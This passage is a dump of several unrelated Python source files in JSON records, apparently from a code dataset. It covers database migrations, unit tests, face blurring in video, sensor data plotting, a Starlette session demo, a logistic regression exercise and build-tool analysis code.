None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('email', sa.String(length=120), nullable=True),\n sa.Column('name', sa.String(length=120), nullable=True),\n sa.Column('apellido_paterno', sa.String(length=120), nullable=True),\n sa.Column('apellido_materno', sa.String(length=120), nullable=True),\n sa.Column('matricula', sa.String(length=10), nullable=True),\n sa.Column('password_hash', sa.String(length=128), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_user_apellido_paterno'), 'user', ['apellido_paterno'], unique=False)\n op.create_index(op.f('ix_user_email'), 'user', ['email'], unique=True)\n op.create_index(op.f('ix_user_matricula'), 'user', ['matricula'], unique=True)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_user_matricula'), table_name='user')\n op.drop_index(op.f('ix_user_email'), table_name='user')\n op.drop_index(op.f('ix_user_apellido_paterno'), table_name='user')\n op.drop_table('user')\n # ### end Alembic commands ###\n","sub_path":"calif/calificaciones-master/migrations/versions/7399e3cc6a76_tabla_usuarios.py","file_name":"7399e3cc6a76_tabla_usuarios.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"453270644","text":"import unittest\nimport os\nimport numpy as np\nfrom neutronbraggedge.experiment_handler.lambda_wavelength import LambdaWavelength\n\n\nclass TofTest(unittest.TestCase):\n\n def setUp(self):\n _file_path = os.path.dirname(__file__)\n self.data_path = os.path.abspath(os.path.join(_file_path, '../../data'))\n\n def test_loading_manual_lambda_array(self):\n \"\"\"Assert in LambdaWavelength - manual loading of array\"\"\"\n _lambda_array = [1., 2., 3., 4., 5., 6., 7., 8., 9.]\n _lambda_handler = LambdaWavelength(data = _lambda_array)\n self.assertTrue(all(_lambda_array == _lambda_handler.lambda_array))\n\n def test_loading_normal_array_data(self):\n \"\"\"Assert in LambdaWavelength - loading of np.array array\"\"\"\n _lambda_array = np.array([1, 2., 3., 4.])\n _lambda_handler = LambdaWavelength(data = _lambda_array)\n self.assertTrue(all(_lambda_array == _lambda_handler.lambda_array))\n\n def test_not_lambda_array_provided(self):\n \"\"\"Assert in LambdaWavelength - no lambda array provided\"\"\"\n self.assertRaises(ValueError, LambdaWavelength)\n\n def test_loading_auto_lambda_array(self):\n \"\"\"Assert in LambdaWavelength - auto loading of array\"\"\"\n _lambda_filename = os.path.join(self.data_path, 'lambda.txt')\n _lambda_handler = LambdaWavelength(filename = _lambda_filename)\n _lambda_expected = np.array([1.10664703784e-09, 1.10916473754e-09, 1.11168243725e-09,\n 1.11420013696e-09, 1.11671783666e-09, 1.11923553637e-09,\n 1.12175323607e-09, 1.12427093578e-09, 1.12678863549e-09,\n 1.12930633519e-09, 1.1318240349e-09, 1.1343417346e-09,\n 1.13685943431e-09, 1.13937713401e-09, 1.14189483372e-09,\n 1.14441253343e-09, 1.14693023313e-09, 1.14944793284e-09,\n 1.15196563254e-09, 1.15448333225e-09]) \n self.assertTrue(all(_lambda_expected[0:5] == _lambda_handler.lambda_array[0:5]))\n\n def test_load_bad_file_name(self):\n \"\"\"Assert in LambdaWavelength - file name is provided but does not exist\"\"\"\n _lambda_filename = os.path.join(self.data_path, 'i_do_not_exist.txt')\n 
self.assertRaises(IOError, LambdaWavelength, _lambda_filename)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/neutronbraggedge/experiment_handler/lambda_test.py","file_name":"lambda_test.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"87940597","text":"# -*- coding: utf-8 -*-\n##############################################################################\n# Copyright (c) 2007, Timothy W. Cook and Contributors. All rights reserved.\n# Redistribution and use are governed by the MPL license.\n#\n# Use and/or redistribution of this file assumes you have read and accepted the\n# terms of the license.\n##############################################################################\n\nu\"\"\"\nFrom the Extract Information Model\n\"\"\"\n__author__ = u'Timothy Cook '\n__docformat__ = u'plaintext'\n__contributors__ = u'Eduardo César '\n\nimport grok\nfrom interfaces import *\n\n\n\nclass AddressedMessage(object):\n u\"\"\"\n The concept of a message addressed to nominated recipients.\n \"\"\"\n\n grok.implements(IAddressedMessage)\n\n def __init__(self, sender, senderReference, addresses, urgency, message):\n self.sender = sender\n self.senderReference = senderReference\n self.addresses = addresses\n self.urgency = urgency\n self.message = message\n\n\nclass Message(object):\n u\"\"\"\n A \"message\" is an authored, possibly signed, piece of content intended for\n one or more recipients. Since the recipient may or may not be known\n directly, recipients are specified in the ADDRESSED_MESSAGE class.\n \"\"\"\n\n grok.implements(IMessage)\n\n def __init__(self, audit, author, content, sig):\n self.audit = audit\n self.author = author\n self.content = content\n self.signature = sig\n\n\n","sub_path":"src/oship.openehr.rm/src/oship/openehr/rm/extract/message/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"270443137","text":"import random\nfrom uuid import UUID\n\nfrom apps.user.models import UserProfile\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom rest_framework import serializers, status\nfrom rest_framework.response import Response\n\n\ndef mark_deleted(self):\n obj = self.get_object()\n\n obj.is_active = False\n try:\n obj.save()\n except ObjectDoesNotExist:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\ndef is_uuid(data):\n try:\n UUID(data, version=4)\n except ValueError:\n return False\n\n return True\n\n\ndef get_user_profile(request):\n user = None\n if request and hasattr(request, 'user'):\n user = UserProfile.get_profile_by_user(request.user)\n if not user:\n raise serializers.ValidationError(\"User doesn't exists\")\n return user\n\n\ndef yes_or_no():\n return bool(random.getrandbits(1))\n","sub_path":"tiberium/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"376512080","text":"'''\nThis script contains the codes that we recently developed, and is used to compile a Cython code.\n\nSteps:\n1. Copy this file to a new .pyx file.\n2. Compile the code by running python3 setup.py build_ext --inplace.\n3. 
Then run test_cython.py.\n\n'''\nimport torch\nimport os\nfrom itertools import product\nimport numpy as np\nimport face_recognition\nimport cv2\nimport matplotlib.patches as patches\nfrom IPython.display import clear_output\nfrom matplotlib.pyplot import imshow\nimport matplotlib.pylab as plt\nfrom PIL import Image, ImageDraw\nimport imageio\nfrom itertools import product\nfrom facenet_pytorch import MTCNN, InceptionResnetV1\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nimport mmcv\nimport numpy as np\nimport pandas as pd\nimport os\nfrom time import time\nfrom array_mp4_conversion import array_to_mp4, mp4_to_array\nfrom numba import jit, prange\nfrom collections import defaultdict\n# cimport numpy as np\n# ctypedef np.uint8_t D_TYPE\n\npath = os.getcwd()\n\nclass video_transformer_base:\n    '''\n    This is the base of video_transformer, containing basic information about the video.\n    '''\n    def __init__(self,\n                 path, \n                 save_path, \n                 file_name, \n                 device='cpu',\n                 display=False):\n        \n        self.video_path = os.path.join(path, \"data\", file_name)\n        self.video_array, self.fps = mp4_to_array(self.video_path)\n        self.display = display\n        self.save_path = save_path\n        self.file_name = file_name\n        self.num_frames = 0\n        if device == 'cpu':\n            self.device = 'cpu'\n        else:\n            self.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n    \n    def main_transformation(self, \n                            face_detection_model, \n                            filter_effect):\n        '''\n        For each frame, do:\n        1. detect the face;\n        2. apply the filter;\n        3. save the processed frame.\n        ''' \n        video_capture = cv2.VideoCapture(self.video_path)\n        frame_count = 0\n        output_frames = []\n        while video_capture.isOpened(): \n            # Grab a single frame of video\n            ret, frame = video_capture.read()\n            # try:\n            #     frame = torch.from_numpy(frame).to(self.device)\n            # except:\n            #     print(ret)\n\n            # Bail out when the video file ends\n            if not ret:\n                video_capture.release()\n                break\n            \n            frame_count += 1\n            # print(frame_count)\n            # print(type(frame))\n            # detect faces\n            if face_detection_model != \"mtcnn\":\n                face_locations = self.face_detection(frame, \n                                                     model=face_detection_model)\n            else:\n                face_locations = self.face_detection_mtcnn(frame)\n            # print(f\"{len(face_locations)} face(s) detected at frame {frame_count}.\")\n\n            # add effect\n            after_effect_frame = filter_effect(frame, face_locations)\n\n            # print(frame_count)\n            if self.display and frame_count % 2 == 0:\n                # If faces were found, we will mark it on frame with blue dots\n                for face_location in face_locations:\n                    top, right, bottom, left = face_location\n                    cv2.rectangle(after_effect_frame,(left, top), (right, bottom), (0, 0, 255), 2)\n                plt.imshow(after_effect_frame)\n                plt.show()\n                clear_output(wait=True)\n            # im = Image.fromarray(after_effect_frame)\n            # im.save(os.path.join(self.save_path, f\"{self.file_name}_prcs_{frame_count}.png\"))\n            output_frames.append(after_effect_frame)\n        self.num_frames = frame_count\n        self.des_arr = np.array(output_frames)\n\n    def face_detection(self, frame, model='svm'):\n        '''\n        Face detection with package face_recognition.\n        Models include: svm, knn, cnn.\n        Defaults to model='svm' because model='cnn' is slow.\n        '''\n        frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n        rgb_frame = frame[:, :, ::-1]\n        face_locations = face_recognition.face_locations(rgb_frame, model=model)\n        # print(f\"{len(face_locations)} face(s) detected.\")\n        \n        return face_locations\n    def face_detection_mtcnn(self, frame):\n        '''\n        Face detection with package facenet_pytorch.\n        MTCNN implemented in Pytorch, so 
also support CUDA.\n ''' \n\n mtcnn = MTCNN(keep_all=True, device=self.device)\n boxes, _ = mtcnn.detect(frame)\n \n if boxes is None:\n boxes = []\n \n boxes = np.array([[box[1], box[2], box[3], box[0]] for box in boxes]).astype(np.int)\n # print(f\"{len(boxes)} face(s) detected.\")\n return boxes\n def oil_effect(self, frame):\n pass\n \n def negative_effect(self, frame, locations):\n des_img = np.copy(frame)\n try:\n for location in locations:\n x_, y_, w_, h_ = location\n t_ = int(y_)\n r_ = int(x_+w_)\n b_ = int(y_+h_)\n l_ = int(x_)\n\n des_img[t_:b_,l_:r_] = 255 - frame[t_:b_,l_:r_]\n except:\n pass\n \n return des_img\n\n def mean_blur(self, frame, locations, radius=5):\n '''\n Apply simple mosaic effect to specified regions. \n '''\n k = 1 / (radius*2+1)**2\n des_img = np.copy(frame)\n height, width, _ = des_img.shape\n # try:\n for location in locations:\n top, right, bottom, left = location\n t_ = max(top+radius,0)\n b_ = min(bottom-radius, height)\n l_ = max(left+radius,0)\n r_ = min(right-radius, width)\n if t_ >= b_ or l_ >= r_:\n continue\n\n for i, j in product(range(t_, b_), range(l_, r_)):\n kernel = frame[i-radius:i+radius+1, j-radius:j+radius+1, :]\n sumed = np.sum(kernel, axis = (0,1)) * k\n des_img[i, j] = sumed.astype(np.uint8)\n # except:\n # pass\n \n return des_img \n \n # construct transformed gif\n def output(self):\n images = []\n frames_count = list(range(1,self.num_frames))\n \n for i in frames_count:\n try:\n images.append(imageio.imread(\n os.path.join(self.save_path, f\"{self.file_name}_prcs_{i}.png\")))\n except:\n pass\n imageio.mimsave(os.path.join(self.save_path, f\"{self.file_name}_prcs.gif\"), images)\n \n def write_to_video(self, output_filename):\n '''\n Write out the video with filter to mp4.\n '''\n array_to_mp4(output_filename, self.des_arr, self.fps)\n\nclass video_transformer_parallel(video_transformer_base):\n '''\n This version views the video as an array for easier parallelization.\n '''\n def __init__(self, path, save_path, file_name, device='cpu',display=False):\n video_transformer_base.__init__(self, path, save_path, file_name, device, display)\n \n self.locations = None\n self.des_arr = None\n\n torch.from_numpy(self.video_array).to(self.device)\n \n #@jit(nopython=False, fastmath=True)\n def mean_blur(self, image, des_img, locations, radius):\n '''\n mean_blur function with a source and destination image, the logic remains the same.\n '''\n # radius has to be even\n if len(locations) == 0:\n return\n k = 1 / (radius*2+1)**2\n height, width, _ = des_img.shape\n for location in locations:\n top, right, bottom, left = location\n t_ = max(top+radius,0)\n b_ = min(bottom-radius, height)\n l_ = max(left+radius,0)\n r_ = min(right-radius, width)\n if t_ >= b_ or l_ >= r_:\n continue\n for i in range(t_, b_):\n for j in range(l_, r_):\n kernel = image[i-radius:i+radius+1, j-radius:j+radius+1, :]\n sumed = np.sum(kernel, axis= 0, dtype=np.uint32)\n sumed = np.sum(sumed, axis=0)\n des_img[i, j, :] = (sumed * k).astype(np.uint8)\n #@jit(nopython=False, parallel=True)\n def get_face_locations(self, face_detection_model):\n '''\n get face_locations on entire video as an array.\n '''\n des_arr = torch.from_numpy(self.video_array.copy()).to(self.device)\n \n if face_detection_model != 'mtcnn':\n locations = list(map(self.face_detection, des_arr))\n else:\n locations = list(map(self.face_detection_mtcnn, des_arr)) \n\n return locations\n #@jit(nopython=False, parallel=True)\n def filter_on_video(self, filter_func, face_detection_model = 'mtcnn', 
radius = 15):\n '''\n Produce filter on the video.\n '''\n self.des_arr = self.video_array.copy()\n frame_size = self.video_array.shape[0]\n self.locations = self.get_face_locations(face_detection_model)\n for i in prange(frame_size):\n filter_func(self.video_array[i], self.des_arr[i], self.locations[i], radius)\n\n ","sub_path":"video_transformer_test_cython.py","file_name":"video_transformer_test_cython.py","file_ext":"py","file_size_in_byte":9374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"363438428","text":"import os, sys\n#sys.argv.append('-b') # run in batch mode so plot windows arent created\nimport numpy as np\nimport pandas as pd\nimport strip_parser\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport glob\nimport argparse\n\nparser = argparse.ArgumentParser(description = 'Produce plots and give averages of strip measurement data')\nparser.add_argument('-i', '--input', type=str, default='strips', help='Name of input file. Can take single file, folder, or regular expressions.')\nparser.add_argument('-o', '--output', type=str, default='plots', help='Name of directory where plots will be saved.')\nparser.add_argument('-a', '--average', type=str, help='Specify excel filename to save averages to file. If no option given average values will not be saved.')\nparser.add_argument('-d', '--drop', type=str, default='', help='Comma separated list of substrings. Measurements from datafile which contain the substrings will be dropped from plotting and averaging.')\nargs = parser.parse_args()\n\n\noutDir = args.output\ninStr = args.input\n\nto_drop = ['Time', '_0', '_1', '_2', '_3', '_Mean', '_V']\nif args.drop:\n to_drop += args.drop.split(',')\nprint('Will drop measurements which contain the following substrings:', to_drop)\n\n\ndef plotter(files):\n\n # Fill a dictionary with the measurement dataframes and other useful info\n # Sensor name is used as the key for each set of measurements\n data = {}\n meas_all = []\n for i, file in enumerate(files):\n sensor, _, _, temp_df = strip_parser.parseFile(file, to_drop, True)\n data[sensor] = {}\n data[sensor]['num'] = i # Use to keep colors consistent when plotting\n data[sensor]['data'] = temp_df.copy(deep=True)\n data[sensor]['measurements'] = list(data[sensor]['data'].columns)\n meas_all += data[sensor]['measurements']\n del temp_df\n \n print('\\n','Found measurements for the following sensors:\\n', data.keys(), '\\n')\n # Find all measurements taken, to know what to plot\n meas_all = list(set(meas_all))\n meas_all.remove('Strip')\n print('Will produce plots for the following measurements:\\n', meas_all)\n\n if not os.path.isdir(outDir):\n os.mkdir(outDir)\n\n # Writing script in a way, where we dont need each sensor to have the exact same measurements for it to run\n sensors = list(data.keys())\n sensors.sort(key = lambda x: x.split('_')[1])\n sensors.sort(key = lambda x: x.split('_')[-1])\n plt_style = '-,'\n for meas in meas_all:\n plt.figure(figsize=(10,6))\n to_plot = [sensor for sensor in sensors if meas in data[sensor]['measurements']]\n for sensor in to_plot:\n #plt.plot(data[sensor]['data']['Strip'], data[sensor]['data'][meas], color=plt.cm.RdYlBu(2*data[sensor]['num']), label=sensor)\n if 'MAINR' in sensor:\n plt_style = '-+'\n plt.plot(data[sensor]['data']['Strip'], np.abs(data[sensor]['data'][meas]), plt_style, label=sensor)\n plt_style = '-,'\n\n plt.xlabel('Strip')\n plt.ylabel(getYUnit(meas))\n plt.title(meas)\n plt.legend(loc='best')\n\n 
plt.savefig('%s/%s.png' % (outDir, meas))\n\n\n print('Now producing average measurement for each sensor')\n\n # Start with a dataframe for all the measurements and keys filled with 0\n avg = pd.DataFrame(np.zeros((len(data.keys()), len(meas_all)), dtype=np.float32), index=list(data.keys()), columns=meas_all)\n for sensor in sensors:\n for meas in data[sensor]['measurements']:\n avg.loc[sensor,meas] = np.mean(data[sensor]['data'][meas])\n\n print(avg)\n\n if args.average:\n avg_out = args.average.split('.')[0]\n avg_out += '.xlsx'\n avg.to_excel(avg_out)\n #outf = open(avg_out, 'w')\n #outf.write(avg.to_csv(), sep='\\t')\n #outf.close()\n\ndef getYUnit(meas):\n if 'Istrip' in meas or 'Current' in meas or 'Pin' in meas:\n return 'Current (A)'\n elif 'Resistance' in meas:\n return 'Resistance ($\\Omega$)'\n elif 'Cap' in meas or ('Inter' in meas and 'C' in meas):\n return 'Capacitance (F)'\n else:\n return meas\n\ndef main():\n global inStr\n if os.path.isdir(inStr):\n inStr += \"/*\"\n files = glob.glob(inStr)\n print('Found the following files:', files)\n if files == []:\n print(\"No files found for input '%s'. Please double check and try again.\" % inStr)\n sys.exit(1)\n plotter(files)\n return 0\n\nif __name__ == '__main__':\n main()\n","sub_path":"multi_sensor_plotter.py","file_name":"multi_sensor_plotter.py","file_ext":"py","file_size_in_byte":4483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"62635155","text":"from enum import Enum\n\nclass Instruction(Enum):\n UP = 1\n RIGHT = 2\n DOWN = 3\n LEFT = 4\n OK = 5\n\n def decode(instruction):\n instruction = instruction.value\n arrInst = [\n (-1, 0),\n (0, 1),\n (1, 0),\n (0, -1),\n ]\n return arrInst[instruction - 1]\n\nclass Remote:\n alphabet = 'abcdefghijklmnoprstuvwxyz'\n\n def __init__(self, width):\n self.width = width\n self.reset()\n\n def reset(self):\n self.position = (0, 0)\n\n def getInstructions(self, word):\n instructions = list()\n for ch in word:\n desiredIdx = Remote.alphabet.index(ch)\n if desiredIdx == -1:\n raise Exception(f'Incorrect character {ch}!')\n row, col = (desiredIdx // self.width, desiredIdx % self.width)\n currRow, currCol = (self.position)\n delta = currRow - row\n action = Instruction.UP if delta > 0 else Instruction.DOWN \n instructions += [action] * abs(delta)\n delta = currCol - col\n action = Instruction.LEFT if delta > 0 else Instruction.RIGHT\n instructions += [action] * abs(delta)\n instructions.append(Instruction.OK)\n self.position = (row, col)\n return instructions\n \n def execute(self, instructions):\n for i in instructions:\n row, col = self.position\n if i == Instruction.OK:\n print(Remote.alphabet[row * self.width + col])\n else:\n # print(i)\n decoded = Instruction.decode(i)\n row += decoded[0]\n col += decoded[1]\n if (row * self.width + col > len(Remote.alphabet)\n or row < 0 or row >= self.width or col < 0 or col >= self.width):\n print(row, col)\n raise Exception('Out of boundaries')\n self.position = (row, col)\n\nr = Remote(5)\ni = r.getInstructions('ivan')\nr.reset()\nr.execute(i)","sub_path":"questions/printRemote.py","file_name":"printRemote.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"293888617","text":"import aioredis\nfrom starlette.applications import Starlette\nfrom starlette.requests import Request\nfrom starlette.responses import JSONResponse\nfrom starlette.routing import Route\n\nfrom starlette_session import 
SessionMiddleware\nfrom starlette_session.backends import BackendType\n\n\nasync def setup_session(request: Request) -> JSONResponse:\n request.session.update({\"data\": \"session_data\"})\n return JSONResponse({\"session\": request.session})\n\n\nasync def clear_session(request: Request):\n request.session.clear()\n return JSONResponse({\"session\": request.session})\n\n\ndef view_session(request: Request) -> JSONResponse:\n return JSONResponse({\"session\": request.session})\n\n\nroutes = [\n Route(\"/setup_session\", endpoint=setup_session),\n Route(\"/clear_session\", endpoint=clear_session),\n Route(\"/view_session\", endpoint=view_session),\n]\n\n\napp = Starlette(debug=True, routes=routes)\n\n\n@app.on_event(\"startup\")\nasync def on_startup():\n redis_client = await aioredis.create_redis_pool((\"localhost\", 6379))\n app.add_middleware(\n SessionMiddleware,\n secret_key=\"secret\",\n cookie_name=\"cookie22\",\n backend_type=BackendType.aioRedis,\n backend_client=redis_client,\n )\n","sub_path":"examples/aioredis_example.py","file_name":"aioredis_example.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"255656971","text":"'''\r\nCreated on 26 Oct 2016\r\n\r\n@author: Nicholas.R_adm\r\n'''\r\nfrom scipy.optimize._minimize import minimize\r\nfrom mpl_toolkits.mplot3d.axes3d import Axes3D\r\n\r\n''' http://www.johnwittenauer.net/machine-learning-exercises-in-python-part-1/ '''\r\n''' http://aimotion.blogspot.co.uk/2011/11/machine-learning-with-python-logistic.html '''\r\n\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n\r\n\r\ndef sigmoid(x, theta):\r\n sig = 1/ ( 1+ np.exp(-x.dot(theta.T)))\r\n return sig\r\n\r\ndef logisticCost(x, m, X, Y, reg = False, lamb = 1):\r\n theta = np.matrix(x)\r\n hyp = sigmoid(X, theta)\r\n\r\n if reg:\r\n ## Must not regularize theta0. 
lambda in essence tells the minimization that we want to fit the data well, but also keep the size of the \r\n #parameters small, thus if we have to minimize including the sum of the parameters, this ensures the size of the parameters is minimized as well\r\n J = 1/m * ((-np.multiply(np.matrix(Y).T,np.log(hyp))) - (np.multiply(( 1 - np.matrix(Y).T), np.log(1-hyp)))).sum(axis = 0) + lamb/(2*m) * np.power(theta[:,1:],2).sum()\r\n else:\r\n J = 1/m * ((-np.multiply(np.matrix(Y).T,np.log(hyp))) - (np.multiply(( 1 - np.matrix(Y).T), np.log(1-hyp)))).sum(axis = 0)\r\n return J\r\n\r\n\r\n\r\ndata1 = pd.read_csv('C:\\\\Users\\\\Nicholas.R_adm\\\\Documents\\\\workspace\\\\Python\\\\Home Scripts\\\\ML exercises\\\\ex2\\\\ex2Data1.txt',header=None )\r\ndata1.columns = ['exam1','exam2','yesNo']\r\n\r\nfig = plt.figure()\r\nplt.scatter(data1.exam1[data1.yesNo == 1 ], data1.exam2[data1.yesNo == 1 ], marker = '+', color = 'black', label = 'admitted')\r\nplt.scatter(data1.exam1[data1.yesNo == 0 ], data1.exam2[data1.yesNo == 0 ], marker = 'o', color = 'yellow', label = 'not admitted')\r\nlegend = plt.legend(loc = 'upper right')\r\n\r\n## Hypothesis for logistic regression uses sigmoid funtion, so hypothesis is either 1 or zero for binary logistic regression\r\n\r\n\r\nX = np.concatenate((np.matrix(np.ones(data1.shape[0])).T,data1.iloc[:,:2].as_matrix()),axis =1)\r\nm= X.shape[0]\r\nY = np.array(data1.iloc[:,2])\r\ntheta = np.matrix(np.zeros(X.shape[1]))\r\nsigVals = sigmoid(X, theta)\r\n\r\n## now try to find minimum with a built in minimizer\r\ntheta = minimize(fun = logisticCost, x0 = np.asarray(theta)[0], args = (m,X,Y), method = 'SLSQP' )\r\n\r\n## thus we use the sigmoid function using a particular training set and the calculated thetas to get a \r\n# 1 or a zero i.e. a yes or a no\r\n\r\n## plot the decision boundary, y = 1: theta0 + theta1X1 + theta2X2 >= 0, => X2 = (-theta0 - theta1X1)/ theta2\r\nplt.plot(np.array(data1.exam1), (np.array(X[:,:2].dot(-theta.x[:2]))[0])/theta.x[2])\r\n\r\n\r\n#### Regularized logistic regression\r\n\r\ndata2 = pd.read_csv('C:\\\\Users\\\\Nicholas.R_adm\\\\Documents\\\\workspace\\\\Python\\\\Home Scripts\\\\ML exercises\\\\ex2\\\\ex2Data2.txt',header=None )\r\ndata2.columns = ['test1','test2','yesNo']\r\n\r\nfig = plt.figure()\r\nplt.scatter(data2.test1[data2.yesNo == 1 ], data2.test2[data2.yesNo == 1 ], marker = '+', color = 'black', label = 'admitted')\r\nplt.scatter(data2.test1[data2.yesNo == 0 ], data2.test2[data2.yesNo == 0 ], marker = 'o', color = 'yellow', label = 'not admitted')\r\nlegend = plt.legend(loc = 'upper right')\r\n\r\nX = np.concatenate((np.matrix(np.ones(data2.shape[0])).T,data2.iloc[:,:2].as_matrix()),axis =1)\r\nm= X.shape[0]\r\nY = np.array(data2.iloc[:,2])\r\n# clearly there is no linear boundary, so straightforward logistic regression will not work as it is only for linear.\r\n# therefore use feature mapping. Aim is to create more features from each data point. We will map the two test features onto eachother as all polynomial combinations \r\n# up to the sixth power, thus converting the linear straightline rgression to polynomial (more complicated decision boundary). 
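With nPoly = 6 the feature map emits x1^(i-j) * x2^j for i = 1..6 and j = 0..i, i.e. 2+3+4+5+6+7 = 27 terms, and the bias column of ones prepended later brings this to 28.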
\r\n# Thus we can transform the original two feature tests into a 28 dimensional vector, and thus a more expressive classifier.\r\n\r\n#feature map: 1, x1, x2,x1x2, x1^2, x1^2x2, x1^2x2^2, x1^3, x1^3x2^3\r\ndef mapFeature(X1, X2, nPoly=1):\r\n xMap = []\r\n for i in range(1,nPoly+1):\r\n for j in range(0,i+1):\r\n xMap.append(np.multiply(np.power(X1,i-j),np.power(X2,j)))\r\n return xMap\r\n\r\nxMap = mapFeature(X[:,1],X[:,2], nPoly = 6) \r\nxMap = np.concatenate([np.matrix(np.ones(X.shape[0])).T,np.concatenate(xMap, axis = 1)],axis = 1) \r\ntheta = np.matrix(np.zeros(xMap.shape[1]))\r\ntheta = minimize(fun = logisticCost, x0 = np.asarray(theta)[0], args = (m,xMap,Y,True,1), method = 'SLSQP' ,options = {'maxiter':500})['x']\r\n\r\n## to visualize, we must calculate the classifiers predictions on an grid, then draw a contour plot of where the prediction changes from y = 0 to y = 1.\r\n\r\nu = np.linspace(-1,1.5,50)\r\nv = np.linspace(-1,1.5,50)\r\n\r\nz = np.zeros([len(u), len(v)])\r\n\r\nfor i in range(len(u)):\r\n for j in range(len(v)):\r\n ## Need to map feature the grid as theta were calculated with mapped features\r\n uMap = np.matrix(mapFeature(u[i],v[j], nPoly = 6))\r\n z[i,j] = np.concatenate([np.matrix(1),uMap],axis = 1) * np.matrix(theta).T\r\n \r\nU,V = np.meshgrid(u,v)\r\ncp = plt.contour(U, V, z.T)\r\n\r\nfigSurf = plt.figure()\r\nax = figSurf.add_subplot(111,projection = '3d')\r\nax.plot_surface(X = U, Y= V,Z = z.T)\r\n\r\n#\" A contour line or isoline of a function of two variables is a curve along which the function \r\n# has a constant value.\"\r\n\r\n## Thus the contour plot shows where the result from the sigmoid will change i.e either side of the constant function\r\n\r\n\r\n## Playing with lambda shows that a smaller lambda will tighten the boundaries, but may lead to overfitting\r\nfig = plt.figure()\r\nplt.scatter(data2.test1[data2.yesNo == 1 ], data2.test2[data2.yesNo == 1 ], marker = '+', color = 'black', label = 'admitted')\r\nplt.scatter(data2.test1[data2.yesNo == 0 ], data2.test2[data2.yesNo == 0 ], marker = 'o', color = 'yellow', label = 'not admitted')\r\nlegend = plt.legend(loc = 'upper right')\r\n\r\nz = np.zeros([len(u), len(v)])\r\n\r\nxMap = mapFeature(X[:,1],X[:,2], nPoly = 6) \r\nxMap = np.concatenate([np.matrix(np.ones(X.shape[0])).T,np.concatenate(xMap, axis = 1)],axis = 1) \r\ntheta = np.matrix(np.zeros(xMap.shape[1]))\r\ntheta = minimize(fun = logisticCost, x0 = np.asarray(theta)[0], args = (m,xMap,Y,True,0.000001), method = 'SLSQP' ,options = {'maxiter':500})['x']\r\n\r\nfor i in range(len(u)):\r\n for j in range(len(v)):\r\n ## Need to map feature the grid as theta were calculated with mapped features\r\n uMap = np.matrix(mapFeature(u[i],v[j], nPoly = 6))\r\n z[i,j] = np.concatenate([np.matrix(1),uMap],axis = 1) * np.matrix(theta).T\r\n \r\nU,V = np.meshgrid(u,v)\r\ncp = plt.contour(U, V, z.T)\r\n\r\n","sub_path":"ML exercises/ex2/Ex2_logistic_regression.py","file_name":"Ex2_logistic_regression.py","file_ext":"py","file_size_in_byte":6605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"217758570","text":"# coding=utf-8\n# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom __future__ import (absolute_import, division, generators, nested_scopes, print_function,\n unicode_literals, with_statement)\n\nimport logging\nimport os\nimport shutil\n\nfrom pants.util.contextutil import temporary_dir\n\n\nlogger = 
logging.getLogger(__name__)\n\n\nclass AnalysisTools(object):\n \"\"\"Analysis manipulation methods required by JvmCompile.\"\"\"\n _PANTS_BUILDROOT_PLACEHOLDER = b'/_PANTS_BUILDROOT_PLACEHOLDER'\n _PANTS_WORKDIR_PLACEHOLDER = b'/_PANTS_WORKDIR_PLACEHOLDER'\n\n def __init__(self, java_home, parser, analysis_cls, pants_buildroot, pants_workdir):\n self.parser = parser\n self._java_home = java_home\n self._pants_buildroot = pants_buildroot.encode('utf-8')\n self._pants_workdir = pants_workdir.encode('utf-8')\n self._analysis_cls = analysis_cls\n self.rebase_mappings = {self._pants_workdir: self._PANTS_WORKDIR_PLACEHOLDER,\n self._pants_buildroot: self._PANTS_BUILDROOT_PLACEHOLDER}\n self.localize_mappings = {v:k for k, v in self.rebase_mappings.items()}\n\n def relativize(self, src_analysis, relativized_analysis):\n if not os.path.isfile(src_analysis):\n logger.debug(\"AnalysisTools: src_analysis file {} does not exist, skipping relativize\".format(src_analysis))\n return\n with temporary_dir() as tmp_analysis_dir:\n tmp_analysis_file = os.path.join(tmp_analysis_dir, 'analysis.relativized')\n\n # NOTE: We can't port references to deps on the Java home. This is because different JVM\n # implementations on different systems have different structures, and there's not\n # necessarily a 1-1 mapping between Java jars on different systems. Instead we simply\n # drop those references from the analysis file.\n #\n # In practice the JVM changes rarely, and it should be fine to require a full rebuild\n # in those rare 